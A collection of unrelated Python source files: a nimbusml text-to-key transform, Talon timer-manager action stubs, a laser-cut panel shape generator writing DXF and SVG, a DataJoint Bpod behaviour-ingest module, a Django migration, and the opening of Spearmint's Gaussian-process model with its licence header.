from ..base_transform import BaseTransform
from ..internal.core.preprocessing.tokey import ToKey as core
from ..internal.utils.utils import trace
class ToKey(core, BaseTransform, TransformerMixin):
"""
Text transforms that can be performed on data before training
a model.
.. remarks::
The ``ToKey`` transform converts a column of text to key values
using a dictionary. This operation can be reversed by using
:py:class:`FromKey <nimbusml.preprocessing.FromKey>` to obtain the
orginal values.
:param columns: a dictionary of key-value pairs, where key is the output
column name and value is the input column name.
* Multiple key-value pairs are allowed.
* Input column type: numeric or string.
* Output column type:
`Key Type </nimbusml/concepts/types#keytype-columns>`_.
* If the output column names are same as the input column names, then
simply specify ``columns`` as a list of strings.
The << operator can be used to set this value (see
`Column Operator </nimbusml/concepts/columns>`_)
For example
* ToKey(columns={'out1':'input1', 'out2':'input2'})
* ToKey() << {'out1':'input1', 'out2':'input2'}
For more details see `Columns </nimbusml/concepts/columns>`_.
:param max_num_terms: Maximum number of terms to keep per column when auto-
training.
:param term: List of terms.
:param sort: How items should be ordered when vectorized. By default, they
will be in the order encountered. If by value items are sorted
according to their default comparison, for example, text sorting will
be case sensitive (for example, 'A' then 'Z' then 'a').
:param text_key_values: Whether key value metadata should be text,
regardless of the actual input type.
:param params: Additional arguments sent to compute engine.
.. seealso::
:py:class:`FromKey <nimbusml.preprocessing.FromKey>`,
:py:class:`OneHotHashVectorizer
<nimbusml.feature_extraction.categorical.OneHotHashVectorizer>`,
:py:class:`OneHotVectorizer
<nimbusml.feature_extraction.categorical.OneHotVectorizer>`,
:py:class:`NGramFeaturizer
<nimbusml.feature_extraction.text.NGramFeaturizer>`.
.. index:: transform, preprocessing, text
Example:
.. literalinclude:: /../nimbusml/examples/ToKey.py
:language: python
"""
@trace
def __init__(
self,
max_num_terms=1000000,
term=None,
sort='Occurrence',
text_key_values=False,
columns=None,
**params):
if columns:
params['columns'] = columns
BaseTransform.__init__(self, **params)
core.__init__(
self,
max_num_terms=max_num_terms,
term=term,
sort=sort,
text_key_values=text_key_values,
**params)
self._columns = columns
def get_params(self, deep=False):
"""
Get the parameters for this operator.
"""
return core.get_params(self)
|
from talon import Context, Module
mod = Module()
ctx = Context()
ctx.matches = r"""
os: linux
tag: user.timer_manager
"""
# systemd is already in service_manager
# mod.tag("systemd", desc="systemd management")
mod.tag("timer_manager", desc="generic timer manager support")
mod.tag("cron", desc="non-systemd timer timer")
@mod.action_class
class Actions:
# System-wide timer control
def timer():
"""Run the default timer manager"""
def timer_status():
"""Show the timer status"""
def timer_stop():
"""Stop a timer"""
def timer_start():
"""Start a timer"""
def timer_disable():
"""Disable a timer"""
def timer_enable():
"""Enable a timer"""
def timer_reload():
"""Reload a timer"""
def timer_restart():
"""Restart a timer"""
def timer_help():
"""Service manager help"""
def timer_kill():
"""Kill a timer"""
def timer_is_enabled():
"""List if a timer is enabled"""
def timer_status_by_name(name: str):
"""List a timers status by name"""
def timer_stop_by_name(name: str):
"""Stop a timer by name"""
def timer_start_by_name(name: str):
"""Start to timer by name"""
def timer_enable_by_name(name: str):
"""Enable a timer by name"""
def timer_disable_by_name(name: str):
"""Disable a timer by name"""
# User timers vs system-wide timers
def timer_user():
"""Run the default timer manager"""
def timer_user_status():
"""Show the timer status"""
def timer_user_stop():
"""Stop a timer"""
def timer_user_start():
"""Start a timer"""
def timer_user_disable():
"""Disable a timer"""
def timer_user_enable():
"""Enable a timer"""
def timer_user_reload():
"""Reload a timer"""
def timer_user_restart():
"""Restart a timer"""
def timer_user_help():
"""Service manager help"""
def timer_user_kill():
"""Kill a timer"""
def timer_user_is_enabled():
"""List if a timer is enabled"""
def timer_user_status_by_name(name: str):
"""List a timers status by name"""
def timer_user_stop_by_name(name: str):
"""Stop a timer by name"""
def timer_user_start_by_name(name: str):
"""Start to timer by name"""
def timer_user_enable_by_name(name: str):
"""Enable a timer by name"""
def timer_user_disable_by_name(name: str):
"""Disable a timer by name"""
|
import ezdxf
import svgwrite
import numpy as np
# https://www.desmos.com/calculator/rtkn6udxmy
# r=-\ 0.0\cdot\cos\left(2\cdot\theta\right)\ -\ \ 0.02\cdot\cos\left(4\cdot\theta\ \right)\ \ +\ 0.0\ \cos\ \left(6\cdot\theta\right)\ +\ 0.1\cos\left(8\cdot\left(\theta\right)\right)\ +\frac{5}{\left|\cos\left(\theta+\frac{\pi}{4}\right)\right|\ +\ \left|\sin\left(\theta+\frac{\pi}{4}\right)\right|}
# r=-\ 0.0\cdot\cos\left(2\cdot\theta\right)\ -\ \ 0.02\cdot\cos\left(4\cdot\theta\ \right)\ \ +\ 0.0\ \cos\ \left(6\cdot\theta\right)\ +\ 0.1\cos\left(8\cdot\left(\theta\right)\right)\ +\frac{5}{\left|\cos\left(\theta+\frac{\pi}{4}\right)\right|\ +\ \left|\sin\left(\theta+\frac{\pi}{4}\right)\right|}
# r\ =5-\cos\left(\theta\cdot2\right)\cdot0.5-0.3\cdot\cos\left(\theta\cdot4\right)+0.1\cdot\cos\left(6\theta\right)
def init_files():
svg_file = svgwrite.Drawing('svgwrite-example.svg', profile='tiny', viewBox=('0 0 1500 1500'))
dxf_file = ezdxf.new('R2000')
return svg_file, dxf_file
def polar_func_square(alfa):
s2s2 = np.sqrt(2.0)
R = s2s2 / (abs(np.cos(alfa + np.pi / 4)) + abs(np.sin(alfa + np.pi / 4)))
return np.cos(alfa) * R, np.sin(alfa) * R
# def polar_func_square_with_ears(alfa):
#
# s2s2 = np.sqrt(2.0)
# R = s2s2 / (abs(np.cos(alfa + np.pi / 4)) + abs(np.sin(alfa + np.pi / 4)))
#
# if alfa > np.pi * 0.72 and alfa < np.pi * 0.80:
# R = R * 0.85
#
# if alfa > np.pi * 1.15 and alfa < np.pi * 1.25:
# R = R * 0.85
#
# return np.cos(alfa) * R, np.sin(alfa) * R
def polar_circle(alfa):
return np.cos(alfa), np.sin(alfa)
def polar_func_device_shape(alfa):
s2s2 = np.sqrt(2.0)
R = s2s2 / (abs(np.cos(alfa + np.pi / 4)) + abs(np.sin(alfa + np.pi / 4))) + 0.01 * np.cos(14 * alfa)
return np.cos(alfa) * R, np.sin(alfa) * R
def polar_func_device_3hole(alfa):
R = 5 / (abs(np.cos(alfa + np.pi / 4)) + abs(np.sin(alfa + np.pi / 4))) - 0.025 * np.cos(4 * alfa) + 0.25 * np.cos(12 * alfa) + 0.1 * np.cos(10 * alfa)
R = R / 3.68
return np.cos(alfa) * R, np.sin(alfa) * R
def polar_func_lamp(alfa):
R = 5 - 0.5 * np.cos(2 * alfa) - 0.3 * np.cos(4 * alfa) + 0.1 * np.cos(6 * alfa)
R = R / 5
return np.cos(alfa) * R, np.sin(alfa) * R
def polar_func_lamp_b(alfa):
R = 5 / (abs(np.cos(alfa + np.pi / 4)) + abs(np.sin(alfa + np.pi / 4))) - 0.04 * np.cos(6 * alfa) + 0.05 * np.cos(8 * alfa)
R = R * 0.276
return np.cos(alfa) * R, np.sin(alfa) * R
def draw_fig_half_with_internal(N_of_points, x0, y0, R, kx, ky, polar_func, R_i, kx_i, ky_i, polar_func_int, alfa_shift_a):
points = []
points_np = np.zeros((N_of_points * 4 + 6), dtype=np.float32)
L = 0
x = 0
y = 0
for i in range(N_of_points + 1):
alfa = alfa_shift_a + i / N_of_points * np.pi
x_prev = x
y_prev = y
x, y = polar_func(alfa)
x = int(kx * R * x * 100) / 100 + x0
y = int(ky * R * y * 100) / 100 + y0
if i > 0:
L += np.sqrt((x - x_prev) * (x - x_prev) + (y - y_prev) * (y - y_prev))
else:
x_first = x
y_first = y
points_np[i * 2] = x
points_np[i * 2 + 1] = y
points.append((x, y))
# internal part
for i in range(N_of_points + 1):
alfa = alfa_shift_a + (N_of_points - i) / N_of_points * np.pi
x_prev = x
y_prev = y
x, y = polar_func_int(alfa)
x = int(kx_i * R_i * x * 100) / 100 + x0
y = int(ky_i * R_i * y * 100) / 100 + y0
if i > 0:
L += np.sqrt((x - x_prev) * (x - x_prev) + (y - y_prev) * (y - y_prev))
points_np[N_of_points * 2 + 2 + i * 2] = x
points_np[N_of_points * 2 + 3 + i * 2 ] = y
points.append((x, y))
points_np[N_of_points * 4 + 4 ] = x_first
points_np[N_of_points * 4 + 5 ] = y_first
points.append((x_first, y_first))
return points, points_np, L
def draw_figure(N_of_points, x0, y0, R, kx, ky, polar_func):
points = []
points_np = np.zeros((N_of_points * 2 + 2), dtype=np.float32)
L = 0
x = 0
y = 0
for i in range(N_of_points + 1):
alfa = i / N_of_points * 2 * np.pi
x_prev = x
y_prev = y
x, y = polar_func(alfa)
x = int(kx * R * x * 100) / 100 + x0
y = int(ky * R * y * 100) / 100 + y0
if i > 0:
L += np.sqrt((x - x_prev) * (x - x_prev) + (y - y_prev) * (y - y_prev))
points_np[i * 2] = x
points_np[i * 2 + 1] = y
points.append((x, y))
return points, points_np, L
def build_svg_path(points):
counter = 0
path = ''
N = int(points.shape[0] / 2)
for p in range(N):
if counter == 0:
path = path + 'M '
else:
path = path + 'L '
path = path + str(points[p * 2]) + ' ' + str(points[p * 2 + 1])
counter += 1
return path
def add_path(svg_file, dxf_msp, points, points_np):
dxf_msp.add_lwpolyline(points)
svg_path = build_svg_path(points_np)
svg_file.add(svg_file.path(d=svg_path,
stroke="#000",
fill="none",
stroke_width=0.1))
def panel(svg_file, msp, L, Center_X, Center_Y, outline):
# Device shape
points, points_np, dl = draw_figure(N_of_points=256, x0=Center_X, y0=Center_Y, R=0.5, kx=380, ky=372, polar_func=polar_func_device_shape)
L += dl
add_path(svg_file, msp, points, points_np)
# # Board outline
if outline == 1:
points, points_np, dl = draw_figure(N_of_points=256, x0=Center_X, y0=Center_Y, R=0.5, kx=342, ky=327.4, polar_func=polar_func_square)
L += dl
add_path(svg_file, msp, points, points_np)
B3_X_step = 36 * 3
B3_Y_step = 36.4 * 3
X_step = 36
Y_step = 36.4
for i in range(3):
for j in range(3):
ij = i * 10 + j
if ij == 0 or ij == 11 or ij == 22:
for ii in range(3):
for jj in range(3):
CX = (i - 1) * B3_X_step + (ii - 1) * X_step + Center_X
CY = (j - 1) * B3_Y_step + (jj - 1) * Y_step + Center_Y
# Small hole for lamp
kx = 32
points, points_np, dl = draw_figure(N_of_points=128, x0=CX, y0=CY, R=0.5, kx=kx, ky=32, polar_func=polar_func_lamp)
L += dl
add_path(svg_file, msp, points, points_np)
if ij == 21 or ij == 12 or ij == 1 or ij == 10:
CX = (i - 1) * B3_X_step + Center_X
CY = (j - 1) * B3_Y_step + Center_Y
points, points_np, dl = draw_figure(N_of_points=128, x0=CX, y0=CY, R=0.5, kx=B3_X_step - 8, ky=B3_Y_step - 4, polar_func=polar_func_square)
L += dl
add_path(svg_file, msp, points, points_np)
if ij == 2 or ij == 20:
for ii in range(3):
for jj in range(3):
CX = (i - 1) * B3_X_step + (ii - 1) * X_step + Center_X
CY = (j - 1) * B3_Y_step + (jj - 1) * Y_step + Center_Y
# Small hole for lamp
kx = 32
points, points_np, dl = draw_figure(N_of_points=128, x0=CX, y0=CY, R=0.5, kx=kx, ky=32, polar_func=polar_func_square)
L += dl
add_path(svg_file, msp, points, points_np)
return L
def angle_part_a(Center_X, Center_Y, kx_k, ky_k, svg_file, msp, ears=0):
L = 0
if ears == 0:
points, points_np, dl = draw_fig_half_with_internal(N_of_points=256, x0=Center_X,
y0=Center_Y, R=0.5, kx=380 * kx_k,
ky=372 * ky_k, polar_func=polar_func_device_shape,
R_i=0.5, kx_i=342 * kx_k, ky_i=327.4 * ky_k,
polar_func_int=polar_func_square,
alfa_shift_a=np.pi / 4)
else:
points, points_np, dl = draw_fig_half_with_internal(N_of_points=256, x0=Center_X,
y0=Center_Y, R=0.5, kx=380 * kx_k,
ky=372 * ky_k, polar_func=polar_func_device_shape,
R_i=0.5, kx_i=302 * kx_k, ky_i=327.4 * ky_k,
polar_func_int=polar_func_square,
alfa_shift_a=np.pi / 4)
add_path(svg_file, msp, points, points_np)
L += dl
for i in range(7):
points, points_np, dl = draw_figure(N_of_points=18, x0=Center_X + (i - 3) * 50 , y0=Center_Y + 175 * ky_k, R=3, kx=1.0, ky=1.0, polar_func=polar_circle)
add_path(svg_file, msp, points, points_np)
L += dl
points, points_np, dl = draw_figure(N_of_points=18, x0=Center_X - 180 * kx_k , y0=Center_Y + (i - 3) * 50 , R=3, kx=1.0, ky=1.0, polar_func=polar_circle)
add_path(svg_file, msp, points, points_np)
L += dl
if ears == 1:
yy = [ 40.9, 77.3, 113.7, 150.1, 186.5, 222.9, 259.3, 295.7, 31.7, 68.1, 104.5, 177.3, 213.7, 250.1, 286.5]
for y_ in yy:
points, points_np, dl = draw_figure(N_of_points=18, x0=Center_X - 171 + 14.859 , y0=Center_Y - 163.7 + y_ , R=2.0, kx=1.0, ky=1.0, polar_func=polar_circle)
add_path(svg_file, msp, points, points_np)
L += dl
return L
def main():
svg_file, dxf_file = init_files()
msp = dxf_file.modelspace()
L = 0
# List outline
# points, points_np, dl = draw_figure(N_of_points=256, x0=750, y0=750, R=0.5, kx=1500, ky=1500, polar_func=polar_func_square)
# add_path(svg_file, msp, points, points_np)
dl = panel(svg_file, msp, L, Center_X=220, Center_Y=220, outline=0)
L += dl
dl = panel(svg_file, msp, L, Center_X=220, Center_Y=650, outline=1)
L += dl
for i in range(18):
Center_X = 610 + i * 30
Center_Y = 200 + i * 30
dl = angle_part_a(Center_X, Center_Y, kx_k=1.0, ky_k=-1.0, svg_file=svg_file, msp=msp)
L += dl
for i in range(4):
Center_X = 610 + 18 * 30 + i * 50
Center_Y = 200 + 18 * 30 + i * 50
dl = angle_part_a(Center_X, Center_Y, kx_k=1.0, ky_k=-1.0, svg_file=svg_file, msp=msp, ears=1)
L += dl
for i in range(6):
Center_X = 1300 - i * 30
Center_Y = 200 + i * 30
dl = angle_part_a(Center_X, Center_Y, kx_k=-1.0, ky_k=-1.0, svg_file=svg_file, msp=msp)
L += dl
for i in range(6):
Center_X = 610 + i * 30
Center_Y = 900 - i * 30
dl = angle_part_a(Center_X, Center_Y, kx_k=1.0, ky_k=1.0, svg_file=svg_file, msp=msp, ears=0)
L += dl
for i in range(8):
Center_X = 1000 + i * 30
Center_Y = 1000 + i * 30
dl = angle_part_a(Center_X, Center_Y, kx_k=-1.0, ky_k=1.0, svg_file=svg_file, msp=msp, ears=0)
L += dl
# My local laser cut service costs me ~1 USD per meter of length (plywood 10mm)
# fanera3d.ru
Center_X = 220
Center_Y = 1050
points, points_np, dl = draw_figure(N_of_points=256, x0=Center_X, y0=Center_Y, R=0.5, kx=380, ky=372, polar_func=polar_func_device_shape)
L += dl
add_path(svg_file, msp, points, points_np)
print('L = ', L)
M = int((L * 32) / 1000)
print('Rub = ', M)
dxf_file.saveas("lwpolyline1.dxf")
svg_file.save()
if __name__ == '__main__':
main()
|
import os
import pathlib
import datajoint as dj
import element_data_loader.utils #github.com/datajoint/element-data-loader
from adamacs import db_prefix, session, behavior
import scipy.io as spio
import numpy as np
schema = dj.schema(db_prefix + 'behavior_ingest')
@schema
class BehaviorIngest(dj.Imported):
definition = """
-> session.Recording
"""
def make(self, key): # reading bpod data to populate
# could model dir navigation after element_array_ephys
# which uses config file for root dir and csv for relative paths
# https://github.com/datajoint/workflow-array-ephys/blob/main/workflow_array_ephys/paths.py
bpod_root_dir = pathlib.Path(get_beh_root_dir(key))
bpod_sess_dir = pathlib.Path(get_beh_sess_dir(key))
bpod_dir = find_full_path(bpod_root_dir,bpod_sess_dir)
bpod_filepath = next(bpod_dir.glob('*.mat'))
trial_info = load_bpod_matfile(key, bpod_filepath )
behavior.Trial.insert(trial_info, ignore_extra_fields=True)
behavior.Event.insert(trial_info, ignore_extra_fields=True)
# --------------------- HELPER LOADER FUNCTIONS -----------------
# see full example here:
# https://github.com/mesoscale-activity-map/map-ephys/blob/master/pipeline/ingest/behavior.py
def load_bpod_matfile(key, matlab_filepath):
"""
Loading routine for behavioral file, bpod .mat
"""
#Loading the file
SessionData = spio.loadmat(matlab_filepath.as_posix(),
squeeze_me=True, struct_as_record=False)['SessionData']
# Add to dict for insertion. For example:
# for trial in range(SessionData.nTrials):
# trial_info['start_time'] = SessionData.RawData.OriginalEventTimestamps[trial]
# return trial_info |
# Generated by Django 2.1.7 on 2020-01-17 09:51
import datetime
from django.db import migrations, models
from django.utils.timezone import utc
class Migration(migrations.Migration):
dependencies = [
('contest', '0005_contestannouncement_update_time'),
]
operations = [
migrations.AlterField(
model_name='contestannouncement',
name='update_time',
field=models.DateTimeField(default=datetime.datetime(2020, 1, 17, 9, 51, 23, 355977, tzinfo=utc)),
),
]
|
# -*- coding: utf-8 -*-
# Spearmint
#
# Academic and Non-Commercial Research Use Software License and Terms
# of Use
#
# Spearmint is a software package to perform Bayesian optimization
# according to specific algorithms (the “Software”). The Software is
# designed to automatically run experiments (thus the code name
# 'spearmint') in a manner that iteratively adjusts a number of
# parameters so as to minimize some objective in as few runs as
# possible.
#
# The Software was developed by Ryan P. Adams, Michael Gelbart, and
# Jasper Snoek at Harvard University, Kevin Swersky at the
# University of Toronto (“Toronto”), and Hugo Larochelle at the
# Université de Sherbrooke (“Sherbrooke”), which assigned its rights
# in the Software to Socpra Sciences et Génie
# S.E.C. (“Socpra”). Pursuant to an inter-institutional agreement
# between the parties, it is distributed for free academic and
# non-commercial research use by the President and Fellows of Harvard
# College (“Harvard”).
#
# Using the Software indicates your agreement to be bound by the terms
# of this Software Use Agreement (“Agreement”). Absent your agreement
# to the terms below, you (the “End User”) have no rights to hold or
# use the Software whatsoever.
#
# Harvard agrees to grant hereunder the limited non-exclusive license
# to End User for the use of the Software in the performance of End
# User’s internal, non-commercial research and academic use at End
# User’s academic or not-for-profit research institution
# (“Institution”) on the following terms and conditions:
#
# 1. NO REDISTRIBUTION. The Software remains the property Harvard,
# Toronto and Socpra, and except as set forth in Section 4, End User
# shall not publish, distribute, or otherwise transfer or make
# available the Software to any other party.
#
# 2. NO COMMERCIAL USE. End User shall not use the Software for
# commercial purposes and any such use of the Software is expressly
# prohibited. This includes, but is not limited to, use of the
# Software in fee-for-service arrangements, core facilities or
# laboratories or to provide research services to (or in collaboration
# with) third parties for a fee, and in industry-sponsored
# collaborative research projects where any commercial rights are
# granted to the sponsor. If End User wishes to use the Software for
# commercial purposes or for any other restricted purpose, End User
# must execute a separate license agreement with Harvard.
#
# Requests for use of the Software for commercial purposes, please
# contact:
#
# Office of Technology Development
# Harvard University
# Smith Campus Center, Suite 727E
# 1350 Massachusetts Avenue
# Cambridge, MA 02138 USA
# Telephone: (617) 495-3067
# Facsimile: (617) 495-9568
# E-mail: [email protected]
#
# 3. OWNERSHIP AND COPYRIGHT NOTICE. Harvard, Toronto and Socpra own
# all intellectual property in the Software. End User shall gain no
# ownership to the Software. End User shall not remove or delete and
# shall retain in the Software, in any modifications to Software and
# in any Derivative Works, the copyright, trademark, or other notices
# pertaining to Software as provided with the Software.
#
# 4. DERIVATIVE WORKS. End User may create and use Derivative Works,
# as such term is defined under U.S. copyright laws, provided that any
# such Derivative Works shall be restricted to non-commercial,
# internal research and academic use at End User’s Institution. End
# User may distribute Derivative Works to other Institutions solely
# for the performance of non-commercial, internal research and
# academic use on terms substantially similar to this License and
# Terms of Use.
#
# 5. FEEDBACK. In order to improve the Software, comments from End
# Users may be useful. End User agrees to provide Harvard with
# feedback on the End User’s use of the Software (e.g., any bugs in
# the Software, the user experience, etc.). Harvard is permitted to
# use such information provided by End User in making changes and
# improvements to the Software without compensation or an accounting
# to End User.
#
# 6. NON ASSERT. End User acknowledges that Harvard, Toronto and/or
# Sherbrooke or Socpra may develop modifications to the Software that
# may be based on the feedback provided by End User under Section 5
# above. Harvard, Toronto and Sherbrooke/Socpra shall not be
# restricted in any way by End User regarding their use of such
# information. End User acknowledges the right of Harvard, Toronto
# and Sherbrooke/Socpra to prepare, publish, display, reproduce,
# transmit and or use modifications to the Software that may be
# substantially similar or functionally equivalent to End User’s
# modifications and/or improvements if any. In the event that End
# User obtains patent protection for any modification or improvement
# to Software, End User agrees not to allege or enjoin infringement of
# End User’s patent against Harvard, Toronto or Sherbrooke or Socpra,
# or any of the researchers, medical or research staff, officers,
# directors and employees of those institutions.
#
# 7. PUBLICATION & ATTRIBUTION. End User has the right to publish,
# present, or share results from the use of the Software. In
# accordance with customary academic practice, End User will
# acknowledge Harvard, Toronto and Sherbrooke/Socpra as the providers
# of the Software and may cite the relevant reference(s) from the
# following list of publications:
#
# Practical Bayesian Optimization of Machine Learning Algorithms
# Jasper Snoek, Hugo Larochelle and Ryan Prescott Adams
# Neural Information Processing Systems, 2012
#
# Multi-Task Bayesian Optimization
# Kevin Swersky, Jasper Snoek and Ryan Prescott Adams
# Advances in Neural Information Processing Systems, 2013
#
# Input Warping for Bayesian Optimization of Non-stationary Functions
# Jasper Snoek, Kevin Swersky, Richard Zemel and Ryan Prescott Adams
# Preprint, arXiv:1402.0929, http://arxiv.org/abs/1402.0929, 2013
#
# Bayesian Optimization and Semiparametric Models with Applications to
# Assistive Technology Jasper Snoek, PhD Thesis, University of
# Toronto, 2013
#
# 8. NO WARRANTIES. THE SOFTWARE IS PROVIDED "AS IS." TO THE FULLEST
# EXTENT PERMITTED BY LAW, HARVARD, TORONTO AND SHERBROOKE AND SOCPRA
# HEREBY DISCLAIM ALL WARRANTIES OF ANY KIND (EXPRESS, IMPLIED OR
# OTHERWISE) REGARDING THE SOFTWARE, INCLUDING BUT NOT LIMITED TO ANY
# IMPLIED WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR
# PURPOSE, OWNERSHIP, AND NON-INFRINGEMENT. HARVARD, TORONTO AND
# SHERBROOKE AND SOCPRA MAKE NO WARRANTY ABOUT THE ACCURACY,
# RELIABILITY, COMPLETENESS, TIMELINESS, SUFFICIENCY OR QUALITY OF THE
# SOFTWARE. HARVARD, TORONTO AND SHERBROOKE AND SOCPRA DO NOT WARRANT
# THAT THE SOFTWARE WILL OPERATE WITHOUT ERROR OR INTERRUPTION.
#
# 9. LIMITATIONS OF LIABILITY AND REMEDIES. USE OF THE SOFTWARE IS AT
# END USER’S OWN RISK. IF END USER IS DISSATISFIED WITH THE SOFTWARE,
# ITS EXCLUSIVE REMEDY IS TO STOP USING IT. IN NO EVENT SHALL
# HARVARD, TORONTO OR SHERBROOKE OR SOCPRA BE LIABLE TO END USER OR
# ITS INSTITUTION, IN CONTRACT, TORT OR OTHERWISE, FOR ANY DIRECT,
# INDIRECT, SPECIAL, INCIDENTAL, CONSEQUENTIAL, PUNITIVE OR OTHER
# DAMAGES OF ANY KIND WHATSOEVER ARISING OUT OF OR IN CONNECTION WITH
# THE SOFTWARE, EVEN IF HARVARD, TORONTO OR SHERBROOKE OR SOCPRA IS
# NEGLIGENT OR OTHERWISE AT FAULT, AND REGARDLESS OF WHETHER HARVARD,
# TORONTO OR SHERBROOKE OR SOCPRA IS ADVISED OF THE POSSIBILITY OF
# SUCH DAMAGES.
#
# 10. INDEMNIFICATION. To the extent permitted by law, End User shall
# indemnify, defend and hold harmless Harvard, Toronto and Sherbrooke
# and Socpra, their corporate affiliates, current or future directors,
# trustees, officers, faculty, medical and professional staff,
# employees, students and agents and their respective successors,
# heirs and assigns (the "Indemnitees"), against any liability,
# damage, loss or expense (including reasonable attorney's fees and
# expenses of litigation) incurred by or imposed upon the Indemnitees
# or any one of them in connection with any claims, suits, actions,
# demands or judgments arising from End User’s breach of this
# Agreement or its Institution’s use of the Software except to the
# extent caused by the gross negligence or willful misconduct of
# Harvard, Toronto or Sherbrooke or Socpra. This indemnification
# provision shall survive expiration or termination of this Agreement.
#
# 11. GOVERNING LAW. This Agreement shall be construed and governed by
# the laws of the Commonwealth of Massachusetts regardless of
# otherwise applicable choice of law standards.
#
# 12. NON-USE OF NAME. Nothing in this License and Terms of Use shall
# be construed as granting End Users or their Institutions any rights
# or licenses to use any trademarks, service marks or logos associated
# with the Software. You may not use the terms “Harvard” or
# “University of Toronto” or “Université de Sherbrooke” or “Socpra
# Sciences et Génie S.E.C.” (or a substantially similar term) in any
# way that is inconsistent with the permitted uses described
# herein. You agree not to use any name or emblem of Harvard, Toronto
# or Sherbrooke, or any of their subdivisions for any purpose, or to
# falsely suggest any relationship between End User (or its
# Institution) and Harvard, Toronto and/or Sherbrooke, or in any
# manner that would infringe or violate any of their rights.
#
# 13. End User represents and warrants that it has the legal authority
# to enter into this License and Terms of Use on behalf of itself and
# its Institution.
import logging
import numpy as np
import numpy.random as npr
import scipy.linalg as spla
import scipy.stats as sps
from .abstract_model import AbstractModel
from ..utils.param import Param as Hyperparameter
import spearmint.kernels
from ..kernels import *
from ..sampling.slice_sampler import SliceSampler
from ..utils import priors
from .. import transformations
from ..transformations import Transformer
# try:
# module = sys.modules['__main__'].__file__
# log = logging.getLogger(module)
# except:
# log = logging.getLogger()
# print 'Not running from main.'
OPTION_DEFAULTS = {
'verbose' : False,
'mcmc_diagnostics' : False,
'mcmc_iters' : 10,
'burnin' : 20,
'thinning' : 0,
'num_fantasies' : 1,
'caching' : True,
'max_cache_mb' : 256,
'likelihood' : 'gaussian',
'kernel' : 'Matern52',
'stability_jitter' : 1e-6,
'fit_mean' : True,
'fit_amp2' : True,
'transformations' : [],
'priors' : [],
'initial_ls' : 0.1,
'initial_mean' : 0.0, # initial values of the hypers
'initial_amp2' : 1.0,
'initial_noise' : 0.0001,
'conditioning' : None,
'batch_size' : 1
}
class GP(AbstractModel):
def __init__(self, num_dims, **options):
opts = OPTION_DEFAULTS.copy()
opts.update(options)
if hasattr(self, 'options'):
opts.update(self.options)
# This is a bit of a mess. Basically to make it work with the GPClassifer --
# but yes I know the GP shouldn't have code for the sake of those who inherit from it
# TODO -- clean this up
self.options = opts
self.num_dims = num_dims
self.batch_size = self.options['batch_size']
self.noiseless = self.options['likelihood'].lower() == "noiseless"
self._inputs = None # Matrix of data inputs
self._values = None # Vector of data values
self.pending = None # Matrix of pending inputs
# TODO: support meta-data
self.params = None
self._cache_list = [] # Cached computations for re-use.
self._hypers_list = [] # Hyperparameter dicts for each state.
self._fantasy_values_list = [] # Fantasy values generated from pending samples.
self.state = None
self._random_state = npr.get_state()
self._samplers = []
# If you are only doing one fantasy of pending jobs, then don't even both sampling
# it from the marginal gaussian posterior predictive and instead just take
# the mean of this distribution. This only has an effect if num_fantasies is 1
self._use_mean_if_single_fantasy = True
# get the Kernel type from the options
try:
self.input_kernel_class = getattr(spearmint.kernels, self.options['kernel'])
except NameError:
raise Exception("Unknown kernel: %s" % self.options['kernel'])
self._kernel = None
self._kernel_with_noise = None
self.num_states = 0
self.chain_length = 0
self.max_cache_bytes = self.options['max_cache_mb']*1024*1024
self._build()
def _set_params_from_dict(self, hypers_dict):
# for name, hyper in self.params.iteritems():
# doing it the above way is worse-- because if you changed the config
# to add hyperparameters, they won't be found in the hypers_dict.
# this way is more robust
for name, hyper in hypers_dict.iteritems():
if name in self.params:
self.params[name].value = hypers_dict[name]
def _prepare_cache(self):
self._cache_list = list()
inputs_hash = hash(self.inputs.tostring())
for i in xrange(self.num_states):
self.set_state(i)
chol = spla.cholesky(self.kernel.cov(self.inputs), lower=True)
alpha = spla.cho_solve((chol, True), self.values - self.mean.value)
cache_dict = {
'chol' : chol,
'alpha' : alpha
}
self._cache_list.append(cache_dict)
def jitter_value(self):
return self.stability_noise_kernel.noise.value
def noise_value(self):
if self.noiseless:
return self.stability_noise_kernel.noise.value
else:
return self.params['noise'].value
def _build(self):
self.params = dict()
# these should be in the right order because the json was parsed with an orderedDict
# could make this more robust by using a list instead...
transformer = Transformer(self.num_dims)
for trans in self.options['transformations']:
assert len(trans) == 1 # this is the convention-- a list of length-1 dicts
trans_class = trans.keys()[0]
trans_options = trans.values()[0]
T = getattr(transformations,trans_class)(self.num_dims, **trans_options)
transformer.add_layer(T)
self.params.update({param.name:param for param in T.hypers})
# Default is BetaWarp (set in main.py)
# else: # default uses BetaWarp
# beta_warp = BetaWarp(self.num_dims)
# transformer.add_layer(beta_warp)
# self.params.update({param.name:param} for param in beta_warp.hypers)
# Build the component kernels
# length_scale_prior = priors.Scale(priors.Beta(1.5, 5.0), 10.0)
length_scale_prior = priors.Scale(priors.Beta(1.5, 7.0), 5.0) # smaller
# length_scale_prior = priors.Scale(priors.Beta(0.5, 7.0), 5.0) # even smaller
# length_scale_prior = None
# set initial/default length scale value to be an array. we can't do this in advance
# because we don't know the size of the GP yet.
if self.options['initial_ls'] is not None and isinstance(self.options['initial_ls'], float):
initial_ls_value = np.ones(self.num_dims) * self.options['initial_ls']
else:
initial_ls_value = self.options['initial_ls']
input_kernel = self.input_kernel_class(self.num_dims, prior=length_scale_prior, value=initial_ls_value, conditioning=self.options["conditioning"])
self.scaled_input_kernel = Scale(input_kernel, value=self.options['initial_amp2'])
self.stability_noise_kernel = Noise(self.num_dims, name='stability_jitter', value=self.options['stability_jitter']) # Even if noiseless we use some noise for stability
sum_kernel = SumKernel(self.scaled_input_kernel, self.stability_noise_kernel)
# The final kernel applies the transformation.
self._kernel = TransformKernel(sum_kernel, transformer)
# Finally make a noisy version if necessary
if not self.noiseless:
noise_kernel = Noise(self.num_dims, value=self.options['initial_noise'])
self._kernel_with_noise = SumKernel(self._kernel, noise_kernel)
# Build the mean function (just a constant mean for now)
self.mean = Hyperparameter(
initial_value = self.options['initial_mean'],
prior = priors.Gaussian(0.0,1.0),
name = 'mean'
)
self.params['ls'] = input_kernel.hypers
# Slice sample all params with compwise=True, except for mean,amp2,(noise) handled below
self._samplers.append(SliceSampler(*self.params.values(), compwise=True, thinning=self.options['thinning']))
amp2 = self.scaled_input_kernel.hypers
self.params['amp2'] = amp2 # stick it in params because PESC examines this
# i guess it doesn't really matter if it is in params, what matters it toSample
toSample = list()
if self.options['fit_amp2']:
toSample.append(amp2)
if self.options['fit_mean']:
self.params['mean'] = self.mean
